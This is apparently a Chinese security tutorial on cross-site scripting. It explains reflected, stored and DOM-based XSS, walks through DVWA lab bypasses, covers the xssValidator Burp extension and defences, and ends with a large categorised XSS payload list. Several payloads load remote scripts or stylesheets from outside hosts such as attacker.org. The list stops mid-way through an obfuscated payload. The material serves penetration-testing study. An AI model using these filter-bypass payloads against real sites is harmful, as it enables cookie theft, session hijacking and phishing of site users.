XSS原理&dvwa&xssvalidator使用

渗透COP之XSS原理&测试案例

1.什么是XSS

跨站脚本（Cross Site Scripting，XSS）是一种经常出现在web应用程序中的计算机安全漏洞。攻击者利用网站漏洞把恶意的代码注入到网页之中。当其他用户浏览到这些网页后，就会执行其中的恶意代码，对受害用户可能采取cookie资料截取、会话劫持、钓鱼欺骗等各种攻击。

Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css，但为了和层叠样式表（Cascading Style Sheet,CSS ）有所区分，故称XSS。

XSS实质是HTML代码与javascript代码的注入。

在测试团队发现漏洞类型中，XSS的发现率名列前四，是常见的漏洞类型。

常见的 XSS 攻击有三种：反射型XSS攻击、DOM-based 型XXS攻击以及存储型XSS攻击。

1.1反射型XSS攻击

1.1.1解释

反射型跨站脚本也称作非持久型、参数型跨站脚本。这种类型的跨站脚本是最常见的，也是使用最广的一种，主要用于将恶意脚本附加到URL地址的参数中，例如：

http://www.test.com/search.php?key=”>

http://www.test.com/logout.asp?out=1&ur1=javascript:alert(document.cookie)

反射型XSS的利用一般是攻击者通过特定手法（比如利用电子邮件），诱惑用户去访问一个包含恶意代码的URL，当受害者单击这些专门设计的链接的时候，恶意JavaScript代码会直接在受害者主机上的浏览器执行。它的特点是只在用户单击时触发，而且只执行一次，非持久化，所以称为反射型跨站式脚本。

反射型XSS的攻击流程如图所示：

此类XSS通常出现在网站的搜索栏、用户登入口等地方，常用来窃取客户端Cookies或进行钓鱼欺骗。

如下为反射型XSS的一个案例：当在该网站的姓名提交框内输入恶意的JavaScript脚本时，点击提交按钮，便出现了反射型XSS攻击，如图所示：

1.1.2通关记录

难度低：

http://192.168.56.115/DVWA-master/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E#

难度中：

大小写绕过

http://192.168.56.115/DVWA-master/vulnerabilities/xss_r/?name=%3CScRipt%3Ealert%28%2Fxss%2F%29%3B%3C%2FScRipt%3E#

双写绕过

ipt>alert(/xss/);

http://192.168.56.115/DVWA-master/vulnerabilities/xss_r/?name=%3Cscr%3Cscript%3Eipt%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E#

难度高：

其他标签

http://192.168.56.115/DVWA-master/vulnerabilities/xss_r/?name=%3Cimg+src%3D1+onerror%3Dalert%28%2Fxss%2F%29%3E#

编码后的其他标签

οnerrοr=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>

http://192.168.56.115/DVWA-master/vulnerabilities/xss_r/?name=%3Cimg+src%3D1+onerror%3Deval%28%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%5Cx28%5Cx27%5Cx78%5Cx73%5Cx73%5Cx27%5Cx29%22%29%3E%3C%2Fimg%3E#

其他标签

http://192.168.56.115/DVWA-master/vulnerabilities/xss_r/?name=%3Ciframe+onload%3Dalert%28%2Fxss%2F%29%3E# 编码后的其他标签 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></object> http://192.168.56.115/DVWA-master/vulnerabilities/xss_r/?name=%3Cobject+data%3D%22data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4%3D%22%3E%3C%2Fobject%3E# 1.1.3相关代码（DVWA-master\vulnerabilities\xss_r\source）： 难度低 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user $html .= '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; } ?> 难度中 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Get input $name = str_replace( '<script>', '', $_GET[ 'name' ] ); // Feedback for end user $html .= "<pre>Hello ${name}</pre>"; } ?> 难度高 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Get input $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); // Feedback for end user $html .= "<pre>Hello ${name}</pre>"; } ?> 难度为不可能 <?php // Is there any input?if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $name = htmlspecialchars( $_GET[ 'name' ] ); // Feedback for end user echo "<pre>Hello ${name}</pre>"; } // Generate Anti-CSRF tokengenerateSessionToken(); ?> PHP htmlspecialchars()函数把预定义的字符转换为HTML实体: & （和号）成为 &" （双引号）成为 " ' （单引号）成为 '//生效需要加 ENT_QUOTES 参数 < （小于）成为 < > （大于）成为 > <h3>1.2存储型XSS攻击</h3> 1.2.1解释 存储型跨站脚本，比反射型跨站脚本更具威胁性，并且可能影响到Web服务器自身的安全。 此类XSS不需要用户单击特定的URL就能执行跨站脚本，攻击者事先将恶意JavaScript代码上传或存储到漏洞服务器中，只要受害者浏览包含此恶意JavaScript代码的页面就会执行恶意代码。 存储型XSS的攻击流程如图所示： <a href="http://img.e-com-net.com/image/info8/65f28b217bb94b269fdc284aa8402b29.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第4张图片" height="292" src="http://img.e-com-net.com/image/info8/65f28b217bb94b269fdc284aa8402b29.jpg" width="365" style="border:1px solid black;"></a> 持久型XSS一般出现在网站的留言、评论。博客日志等交互处，恶意脚本被存储到客户端或者服务器的数据库中，当其他用户浏览该网页时，站点即从数据库中读取恶意用户存入的非法数据，然后显示在页面中，即在受害者主机上的浏览器执行恶意代码。 如下为存储型XSS的一个案例：当攻击者在留言框内输入恶意JavaScript代码并提交后，其他用户再浏览这个页面时，就会发生存储型XSS攻击，如图所示： <a href="http://img.e-com-net.com/image/info8/3f2bf9e470414921a8a4a36da7fdf029.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第5张图片" height="328" src="http://img.e-com-net.com/image/info8/3f2bf9e470414921a8a4a36da7fdf029.jpg" width="553" style="border:1px solid black;"></a> <a href="http://img.e-com-net.com/image/info8/c5661fa93fdf4bd8970f73b35167f6d0.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第6张图片" height="116" src="http://img.e-com-net.com/image/info8/c5661fa93fdf4bd8970f73b35167f6d0.jpg" width="553" style="border:1px solid black;"></a> 存储型XSS不需要用户去单击URL进行触发，所以他的危害比反射型XSS大，黑客可以利用它渗透网站、挂马、钓鱼…… 1.2.2通关记录 简单： <script>alert(/xss/)</script> 中等： 大小写绕过 <ScRipt>alert(/xss/);</ScRipt> 双写绕过 <scr<script>ipt>alert(/xss/);</script> 难： 其他标签 <img src=1 οnerrοr=alert(/xss/)> 1.2.3相关代码（DVWA-master\vulnerabilities\xss_r\source）： 难度低 trim(string,charlist) 函数移除字符串两侧的空白字符或其他预定义字符，预定义字符包括\0、\t、\n、\x0B、\r以及空格，可选参数charlist支持添加额外需要删除的字符。' mysqli_real_escape_string(string,connection) 函数会对字符串中的特殊符号（\x00，\n，\r，\，'，"，\x1a）进行转义。 stripslashes(string) 函数删除字符串中的反斜杠。 难度中 strip_tags()函数剥去字符串中的HTML、XML以及PHP的标签，但允许使用标签。 addslashes()函数返回在预定义字符（单引号、双引号、反斜杠、NULL）之前添加反斜杠的字符串。 难度高 难度不可能 <h3>1.3DOM-based 型XSS攻击</h3> 1.3.1解释 DOM—based XSS漏洞是基于文档对象模型Document Objeet Model，DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口，它允许程序或脚本动态地访问和更新文档内容、结构和样式，处理后的结果能够成为显示页面的一部分。DOM中有很多对象，其中一些是用户可以操纵的，如uRI，location，refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容，它不依赖于提交数据到服务器端，而从客户端获得DOM中的数据在本地执行，如果DOM中的数据没有经过严格确认，就会产生DOM—based XSS漏洞。 DVWA练习环境“易”“中”“难”练习过程记录： <a href="http://img.e-com-net.com/image/info8/3775a3794401430e91886e3f2f21f989.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第7张图片" height="300" src="http://img.e-com-net.com/image/info8/3775a3794401430e91886e3f2f21f989.jpg" width="553" style="border:1px solid black;"></a> 1.3.2通关记录 简单： http://192.168.56.115/DVWA-master/vulnerabilities/xss_d/?default=<script>alert('hack')</script> 中等： 发现过滤了“ <script ”于是尝试 http://192.168.56.115/DVWA-master/vulnerabilities/xss_d/?default=<img src=1 onerror-alert('hack')> 发现没有闭合，于是尝试 http://192.168.56.115/DVWA-master/vulnerabilities/xss_d/?default=></option><img src=1 οnerrοr=alert('hack')> 发现没有完全闭合，于是 http://192.168.56.115/DVWA-master/vulnerabilities/xss_d/?default=></option></select><img src=1 οnerrοr=alert('hack')> 难：91 http://192.168.56.115/DVWA-master/vulnerabilities/xss_d/?default=#<script>alert(/hack/)</script> 1.3.4相关代码（DVWA-master\vulnerabilities\xss_d\source）： 页面源代码 <div class="vulnerable_code_area"> Please choose a language: <form name="XSS" method="GET"> <select name="default"> <script> if (document.location.href.indexOf("default=") >= 0) { var lang = document.location.href.substring(document.location.href.indexOf("default=")+8); document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>"); document.write("<option value='' disabled='disabled'>----</option>"); } document.write("<option value='English'>English</option>"); document.write("<option value='French'>French</option>"); document.write("<option value='Spanish'>Spanish</option>"); document.write("<option value='German'>German</option>"); </script> </select> <input type="submit" value="Select" /> </form> </div> 判断 "default=" 是否存在 取出 default 的值并赋值给变量lang 写入<option value='"lang"'>"decodeURL(lang)</option> document表示的是一个文档对象，window.location.href 当前页面完整 URL。 indexOf() 方法可返回某个指定的字符串值在字符串中首次出现的位置。 substring() 方法用于提取字符串中介于两个指定下标之间的字符。如果少后参数那么返回的子串会一直到字符串的结尾。 document.write是JavaScript中对document.open所开启的文档流(document stream操作的API方法，它能够直接在文档流中写入字符串，一旦文档流已经关闭，那document.write就会重新利用document.open打开新的文档流并写入，此时原来的文档流会被清空，已渲染好的页面就会被清除，浏览器将重新构建DOM并渲染新的页面。 难度低 <?php # No protections, anything goes ?> 难度中 服务端代码 <?php // Is there any input? if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) { $default = $_GET['default']; # Do not allow script tags if (stripos ($default, "<script") !== false) { header ("location: ?default=English"); exit; } } ?> 页面源代码 <a href="http://img.e-com-net.com/image/info8/6359afc665ad4f8480a81e6ead411e9d.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第8张图片" height="279" src="http://img.e-com-net.com/image/info8/6359afc665ad4f8480a81e6ead411e9d.jpg" width="553" style="border:1px solid black;"></a> select标签里面的option标签可以嵌套其它标签，但审查元素会发现标签被剔除了，只显示了标签里面的文本。 　　不能的原因，网上找到一个解释： option标签在网页中并没有直接显示，而是作为下拉框的选项内容之一， 其样式是由当前浏览器决定的，所以option标签之间只会有文本内容。 难度高 <?php // Is there any input? if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) { # White list the allowable languages switch ($_GET['default']) { case "French": case "English": case "German": case "Spanish": # ok break; default: header ("location: ?default=English"); exit; } } ?> 难度不可能 <?php # Don't need to do anything, protction handled on the client side ?> 页面源代码 <a href="http://img.e-com-net.com/image/info8/0e6801ce2cad4ea1821a68686e63ea6b.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第9张图片" height="303" src="http://img.e-com-net.com/image/info8/0e6801ce2cad4ea1821a68686e63ea6b.jpg" width="554" style="border:1px solid black;"></a> <h2>2.常见手工测试思路</h2> 1.测试所有可控输入点 XSS本身并不难防御，但是程序员总是有意想不到的输入点。“GET请求”要重点关注。 2.直接上常见的payload XSS漏洞历史久远，网上有很多很好用的payload，可以拿来直接用。 反射型xss：<script>alert(1)</script> DOM型xss：<img src=123 οnerrοr=alert(123)> 3.尝试特殊字符 例如：< > ‘ “ /  4.对常见payload编码后使用 针对 <script>alert(1)</script> URL编码 %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e HTML实体编码 <script>alert(1)</script> BASE64编码 PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== Unicode 编码 略 <h2>3.XSS检测工具的使用</h2> <h3>3.1burpsuite扩展工具之xssValidator</h3> 安装和使用方法 https://blog.csdn.net/u013175604/article/details/84841268 3.1.1安装xssValidator必备三件套 检查是否安装有Phantomjs，是否有下载xss.js <a href="http://img.e-com-net.com/image/info8/ab47a01d4fb44f6e871f34c92ff3fa53.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第10张图片" height="214" src="http://img.e-com-net.com/image/info8/ab47a01d4fb44f6e871f34c92ff3fa53.jpg" width="328" style="border:1px solid black;"></a> Extender 里BAppstore 点击install xssValidator <a href="http://img.e-com-net.com/image/info8/d3f28df87e7544e5bca4f48b1242e6c4.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第11张图片" height="285" src="http://img.e-com-net.com/image/info8/d3f28df87e7544e5bca4f48b1242e6c4.jpg" width="553" style="border:1px solid black;"></a> 3.1.2使用xssValidator基本方法 使用该工具演示下使用的过程。 步骤一： Cmd下执行xss.js 打开监听 <a href="http://img.e-com-net.com/image/info8/066f1b6bcf7f40c2899b1d44b1ca7075.jpg" target="_blank"><img alt="" height="89" src="http://img.e-com-net.com/image/info8/066f1b6bcf7f40c2899b1d44b1ca7075.jpg" width="554"></a> 步骤二： 抓一个数据包，送到intruder。然后在intruder的payloads做如下设置，选择扩展里面的xssvalitor。 <a href="http://img.e-com-net.com/image/info8/fc8e5e5389be4023a1b343f0ddd50e06.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第12张图片" height="393" src="http://img.e-com-net.com/image/info8/fc8e5e5389be4023a1b343f0ddd50e06.jpg" width="554" style="border:1px solid black;"></a> <a href="http://img.e-com-net.com/image/info8/bc4e5b54367849ac94dc8ee8bf60bc21.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第13张图片" height="300" src="http://img.e-com-net.com/image/info8/bc4e5b54367849ac94dc8ee8bf60bc21.jpg" width="553" style="border:1px solid black;"></a> <a href="http://img.e-com-net.com/image/info8/260d55860d7c4c9ab685900c83941880.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第14张图片" height="372" src="http://img.e-com-net.com/image/info8/260d55860d7c4c9ab685900c83941880.jpg" width="553" style="border:1px solid black;"></a> 鉴于如上方法使用效果一直不太好。我一般喜欢把下面几个payload的关键词也直接导入到Grep-Match。 <a href="http://img.e-com-net.com/image/info8/5cfdd3e775dc48359c6438fbed736f9b.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第15张图片" height="362" src="http://img.e-com-net.com/image/info8/5cfdd3e775dc48359c6438fbed736f9b.jpg" width="554" style="border:1px solid black;"></a> 步骤三： 点击start attack，对result里的Grep-Match排序。对关键词打钩和响应字体标色的行作为重点关注对象。注意观察cmd窗口，是否有测试HTTP包快速打印。 3.1.3使用xssValidator测试结果 3.1.3.1用DVWA（ref-mid）做XSS检测结果： <a href="http://img.e-com-net.com/image/info8/5b013582c0b342378a2eee92ec5b1144.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第16张图片" height="203" src="http://img.e-com-net.com/image/info8/5b013582c0b342378a2eee92ec5b1144.jpg" width="554" style="border:1px solid black;"></a> <a href="http://img.e-com-net.com/image/info8/3597777b4a0248ce8966f1a7ea7e4374.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第17张图片" height="408" src="http://img.e-com-net.com/image/info8/3597777b4a0248ce8966f1a7ea7e4374.jpg" width="553" style="border:1px solid black;"></a> <a href="http://img.e-com-net.com/image/info8/661dde88fc674ae391cebebb9d7ea033.jpg" target="_blank"><img alt="XSS原理&dvwa&xssvalidator使用_第18张图片" height="109" src="http://img.e-com-net.com/image/info8/661dde88fc674ae391cebebb9d7ea033.jpg" width="554" style="border:1px solid black;"></a> <h3>3.2xssValidator使用体会：</h3> 目前本组近期所有渗透测试出来的XSS问题，burpsuite scanner 和xssValidator两种方法都是可以找到的。burpsuite scanner因为批量检查速度快，我使用的更多。未有发现xssValidator更优越的例子。但是xssValidator和intruder是结合一起用的，可定制化更强。 XSS漏洞的测试手工必不可少，工具只是辅助。 <h2>4.XSS防御主要方法</h2> XSS 存在的根本原因是，对URL中的参数，对用户输入提交给web server的内容，没有进行充分的过滤。如果我们能够在web程序中，对用户提交的URL中的参数，和提交的所有内容，进行充分的过滤，将所有的不合法的参数和输入内容过滤掉，那么就不会导致“在用户的浏览器中执行攻击者自己定制的脚本”。 但是，其实充分而完全的过滤，实际上是无法实现的。因为攻击者有各种各样的神奇的，你完全想象不到的方式来绕过服务器端的过滤，最典型的就是对URL和参数进行各种的编码，比如escape, encodeURI, encodeURIComponent, 16进制，10进制，8进制，来绕过XSS过滤。那么我们如何来防御XSS呢？ 使用XSS Filter 对用户提交的信息进行有效的验证，仅接受指定长度范围内的，采用适当格式的内容提交，阻止或者忽略此外的其他任何数据。此外，还需过滤有效的和净化有害的输入。 例如： 表单数据指定值的类型：年龄只能是 int 、name 只能是字母数字等。 过滤或移除特殊的 html 标签：<script>、<iframe>等。 过滤 js 事件的标签：onclick、onerror、onfocus等。 对输出进行编码 在输出数据之前对潜在的威胁的字符进行编码、转义是防御XSS攻击十分有效的措施。如果使用好的话，理论上是可以防御住所有的XSS攻击的。 对所有要动态输出到页面的内容，通通进行相关的编码和转义。当然转义是按照其输出的上下文环境来决定如何转义的。 a）作为body文本输出，作为html标签的属性输出： 比如：${username}, <c:out value="${username}"></c:out> <input type="text" value="${username}" /> 此时的转义规则如下： < 转成 < > 转成 > & 转成 & " 转成 " ' 转成 ' b) javascript事件 <input type="button" οnclick='go_to_url("${myUrl}");' /> 除了上面的那些转义之外，还要附加上下面的转义： \ 转成 \\ / 转成 \/ ; 转成；(全角;) c) URL属性 如果 <script>, <style>, <imt> 等标签的 src 和 href 属性值为动态内容，那么要确保这些url没有执行恶意连接。 确保：href 和 src 的值必须以 http://开头，白名单方式；不能有10进制和16进制编码字符。 使用Http Only cookie 许多 XSS 攻击的目的就是为了获取用户的cookie，将重要的 cookie 标记为http only，这样的话当浏览器向服务端发起请求时就会带上cookie字段，但是在脚本中却不能访问 cookie，这样就避免了XSS攻击利用JavaScript的document.cookie获取cookie。 <h2>5.XSS payload大全</h2> 收集的一些XSS payload，主要分为五大类，便于查阅。 <h3>第一类：Javascript URL</h3> <a href="javascript:alert('test')">link</a> <a href="javascript:alert('xss')">link</a> <a href='vbscript:MsgBox("XSS")'>link</a> <a href="vbscript:alert(1)">Hello</a> <a href="vbscript:alert(1)">Hello</a> <a href=javascript:alert("XSS")>link</a> <a href=`javascript:alert("RSnake says,'XSS'")`>link</a> <a href=javascript:alert(String.fromCharCode(88,83,83))>link</a> <a href="javascript:alert(1)">link</a> <a href="javaSCRIPT:alert(1)">Hello</a> <a href="javasc ript:alert(1)">link</a> <a href="javas cript:\u0061lert(1);">Hello</a> <a href="jav ascript:alert('XSS')">link</a> <a href="jav ascript:alert('XSS')">link</a> <a href="jav ascript:alert('XSS')">link</a> <a href=" javascript:alert('XSS');">link</a> <a href="javascript:\u0061lert(1)">Hello</a> <a href="javascript:confirm`1`">link</a> <a href="javascript:confirm(1)">link</a> <a href="j a vas c r ipt:alert(1)">1</a> <a href="javascript:%61%6c%65%72%74%28%31%29">link</a> <a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">link</a> <a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>2</a> <a href=javascript:eval("alert('xss')")>link</a> <a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>link</a> <a href=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>link</a> <a href=javascript:alert('XSS')>link</a> <a href="data:text/html;base64,amF2YXNjcmlwdDphbGVydCgxKQ==">test</a> <a href=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+>1</a> <iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <h3>第二类：CSS import</h3> <style>@import url("http://attacker.org/malicious.css");</style> <style>@imp\ort url("http://attacker.org/malicious.css");</style> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <STYLE>@import'http://jb51.net/xss.css';</STYLE> <h3>第三类：Inline style</h3> <div style="color: expression(alert('XSS'))"> <div style=color:expression\(alert(1))></div> <div style="color: '<'; color: expression(alert('XSS'))"> <div style=X:expression(alert(/xss/))> <div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))"> <div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))"> <div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS<DIV STYLE="background-image: url(javascript:alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <div style="z:exp/*anything*/res/*here*/sion(alert(1))"> <div style=xss:expr/*XSS*/ession(alert('XSS'))> </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> </XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.baidu.com")> <img STYLE="background-image:url(javascript:alert('XSS'))"> //ie6 <img STYLE="background-image:\75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29"> <A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <h3>第四类：JavaScript 事件</h3> <div οnclick="alert('xss')"> <div οnmοuseenter="alert('xss')"> <div onclick ="alert('xss')"> <BODY ONLOAD=alert('XSS')> <img src=1 οnerrοr=alert(1)> <img/src='1'/οnerrοr=alert(0)> <img src="1" οnerrοr="alert(1)" /> <img src=1 alt=al lang=ert οnerrοr=top[alt+lang](0)> <img src="1" οnerrοr=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img> <img src=1 οnmοuseοver=alert('xss') a1=1111> <img src=x οnerrοr=s=createElement('script');body.appendChild(s);s.src='http://t.cn/R5UpyOt';> <a href="#" οnclick=alert('\170\163\163')>test</a> <a href="#" οnclick="\u0061\u006C\u0065\u0072\u0074(1)">link</a> <a href="#" οnclick="\u0061\u006C\u0065\u0072\u0074`a`">link</a> <a href="#" οnclick="alert('xss')">link</a> <marquee οnscrοll=alert(1)> test</marquee> <div style="width:100px;height:100px;overflow:scroll" οnscrοll="alert('a')">123456 </div> <DIV onmousewheel="alert('a')" >123456</DIV> <div style="background-color:red" οnmοuseenter="alert('a')">123456</div> <DIV οnmοuseleave="alert('1')">123456</DIV> <div contentEditable="true" style="background-color:red" οnfοcusin="alert('a')" >asdf</div> <div contentEditable="true" style="background-color:red" οnfοcusοut="alert('bem')" >asdf</div> <marquee onstart="alert('a')" >asdf</marquee> <div style="background-color:red;" onbeforecopy="alert('a')" >asdf</div> <div style="background-color:red;" onbeforecut="alert('a')" >asdf</div> <div style="background-color:red;" contentEditable="true" onbeforeeditfocus="alert('a')" >asdf</div> <div style="background-color:red;" ="true" onbeforepaste="alert('a')" >asdf</div> <div style="background-color:red;" οncοntextmenu="alert('a')" >asdf</div> <div style="background-color:red;" οncοpy="alert('a')" >asdf</div> <div contentEditable="true" style="background-color:red;" oncut="alert('a')" >asdf</div> <div style="background-color:red;" οndrag="alert('1')" >asdf</div> <div style="background-color:red;" οndragend="alert('a')" >asdf</div> <div style="background-color:red;" οndragenter="alert('b')" >asdf</div> <div contentEditable="true" style="background-color:red;" οndragleave="alert('a')" >asdf</div> <div contentEditable="true" style="background-color:red;" οndragοver="alert('b')" >asdf</div> <div contentEditable="true" style="background-color:red;" οndragstart="alert('a')" >asdf</div> <div contentEditable="true" style="background-color:red;" οndrοp="alert('b')" >asdf</div> <div contentEditable="true" style="background-color:green;" οndrοp="alert('bem')" >asdf</div> <div contentEditable="true" style="background-color:red;" onlosecapture="alert('b')">asdf</div> <div contentEditable="true" style="background-color:red;" οnpaste="alert('a')" >asdf</div> <div contentEditable="true" style="background-color:red;" onselectstart="alert('a')" >asdf</div> <div contentEditable="true" style="background-color:red;" onhelp="alert('a')" >asdf</div> <div STYLE="background-color:red;behavior:url('#default#time2')" onEnd="alert('a')">asdf</div> <div STYLE="background-color:red;behavior:url('#default#time2')" onBegin="alert('a')">asdf</div> <div contentEditable="true" STYLE="background-color:red;" onactivate="alert('b')">asdf</div> <div contentEditable="true" STYLE="background-color:red;filter: Alpha(opacity=100, style=2);"onfilterchange="alert('b')">asdf</div> <div contentEditable="true" onbeforeactivate="alert('b')">asdf</div> <div contentEditable="true" onbeforedeactivate="alert('a')">asdf</div> <div contentEditable="true" ondeactivate="alert('bem')">asdf</div> <video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" /> <video src="http://www.w3schools.com/html5/movie.ogg" οnlοadstart="alert(1)" /> <audio src="http://www.w3schools.com/html5/movie.ogg" οnlοadstart="alert(1)"> <audio src="http://www.w3schools.com/html5/movie.ogg" οnlοadstart="alert(1)"></audio> <body οnscrοll=alert(26)> <input type="hidden" accesskey="X" οnclick="alert(/xss/)"> <h3>第五类：Script 标签</h3> <script src="http://baidu.com"></script> <script>alert("XSS")</script> <scr<script>ipt>alert("XSS")</scr<script>ipt> <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> <script>alert(/1/.source)</script> <script>alert(1);</script> <script>prompt(1);</script> <script>confirm(1);</script> <script>alert(/88199/)</script> <script>alert(`a`)</script> <script>alert('a')</script> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <script>eval(alert(1))</script> <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 50, 51, 41))</script> <script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029")</script> <script>eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script> <script>setTimeout('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script> <script>setTimeout(alert(1),0)</script> <script>setTimeout`alert\x28\x27 xss \x27\x29`</script> <script>setInterval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script> <script src=data:text/javascript,alert(1)></script> <script src=&#100&#97&#116&#97:text/javascript,alert(1)></script> <script>\u0061\u006C\u0065\u0072\u0074(123)</script> <script>\u0061\u006C\u0065\u0072\u0074(1)</script> <script>\u0061\u006C\u0065\u0072\u0074`a`</script> <script>window['alert'](0)</script> <script>parent['alert'](1)</script> <script>self['alert'](2)</script> <script>top['alert'](3)</script>  <script>alert("xss");;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!